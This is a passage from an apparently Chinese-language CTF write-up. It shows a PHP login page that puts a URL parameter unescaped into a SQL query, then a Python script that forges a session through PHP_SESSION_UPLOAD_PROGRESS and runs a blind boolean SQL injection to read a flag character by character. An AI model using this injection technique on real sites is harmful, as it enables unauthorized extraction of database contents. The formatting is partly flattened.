isset($_GET['p']) AND $_GET['p'] === "register"AND $_SERVER['REQUEST_METHOD'] === 'POST'ANDisset($_POST['username']) ANDisset($_POST['password']) AND @include('templates/register.php'); isset($_GET['p']) AND $_GET['p'] === "login"AND $_SERVER['REQUEST_METHOD'] === 'GET'ANDisset($_GET['username']) ANDisset($_GET['password']) AND @include('templates/login.php'); isset($_GET['p']) AND $_GET['p'] === "home"AND @include('templates/home.php');
?>
在没有宽字符注入的情况下addslashes几乎是不可能直接绕过的
再看一看login.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
<?php //如果没有session的话就退出 //注意login.php根本没有session_start() !isset($_SESSION) ANDdie("Direct access on this script is not allowed!"); include'db.php';
echo $_GET['username']; $sql = 'SELECT `username`,`password` FROM `test`.`users` where `username`="'.$_GET['username'].'" and password="'.md5($_GET['password']).'";'; $result = $con->query($sql);
result ='' url = 'http://127.0.0.1/' data = '''------WebKitFormBoundary8Jltb5vw5fWfSYS4 Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS" asdfasdfasdf ------WebKitFormBoundary8Jltb5vw5fWfSYS4--''' headers = {'Cookie' : 'PHPSESSID=yelang123;', 'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundary8Jltb5vw5fWfSYS4'} for x in range(1,10000): for i in range(32,128): payload = "/templates/login.php?username=1\"or if(ascii(substr((select group_concat(secret) from flag_tbl),{1},1))={0},1,0)%23&password=tlqkf12a".format(i,x); r = requests.post(url+payload,headers=headers,data=data,proxies={'http':'http://127.0.0.1:8080'}) # print(r.text) if"Try again!"notin r.text: result += chr(i) print(result) break; else: continue; print(result)